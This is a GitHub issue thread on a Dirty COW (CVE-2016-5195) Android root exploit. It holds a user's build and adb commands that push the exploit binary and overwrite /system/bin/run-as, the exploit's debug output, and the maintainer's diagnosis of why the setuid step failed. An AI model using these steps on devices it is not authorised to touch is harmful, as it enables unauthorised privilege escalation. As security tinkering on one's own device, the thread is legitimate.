timwr / CVE-2016-5195

CVE-2016-5195 (dirtycow/dirtyc0w) proof of concept for Android

setresgid/setresuid failed; looking for some help to get the exploit working #34

Closed connorbode closed 8 years ago

connorbode commented 8 years ago

Hey guys, looking for a bit of direction for getting this exploit working on my device. It's a Samsung Galaxy E 7" Lite, running at Android SDK 19 (based on adb shell getprop ro.build.version.sdk).

I've attempted to build for APP_PLATFORM=android-19 and couldn't compile due to missing sys/capabilities.h headers. I've also attempted to increase the loop size without success.

I've pasted the output from my initial trial below. Interested in messing around with the code but need some direction as to what is potentially going wrong with the exploit.

Thanks!

```
→ make root
../ndk/ndk-build NDK_PROJECT_PATH=. APP_BUILD_SCRIPT=./Android.mk APP_PLATFORM=android-21
make[1]: Entering directory `~/Desktop/android_root/CVE-2016-5195'
[armeabi] Install        : dirtycow => libs/armeabi/dirtycow
[armeabi] Compile thumb  : run-as <= run-as.c
[armeabi] Executable     : run-as
[armeabi] Install        : run-as => libs/armeabi/run-as
make[1]: Leaving directory `~/Desktop/android_root/CVE-2016-5195'
adb push libs/armeabi/dirtycow /data/local/tmp/dirtycow
1981 KB/s (13516 bytes in 0.006s)
adb push libs/armeabi/run-as /data/local/tmp/run-as
1157 KB/s (9420 bytes in 0.007s)
adb shell 'chmod 777 /data/local/tmp/run-as'
adb shell '/data/local/tmp/dirtycow /system/bin/run-as /data/local/tmp/run-as'
warning: new file size (9420) and file old size (9440) differ

size 9440

[*] mmap 0xb6ef6000
[*] exploit (patch)
[*] currently 0xb6ef6000=464c457f
[*] madvise = 0xb6ef6000 9440
[*] madvise = 0 1048576
[*] /proc/self/mem 1308622848 1048576
[*] exploited 0xb6ef6000=464c457f
adb shell /system/bin/run-as
running as uid 2000
setresgid/setresuid failed
uid 2000
```

timwr commented 8 years ago

It looks like your device is vulnerable but /system/bin/run-as does not have the setuid bit set on your device.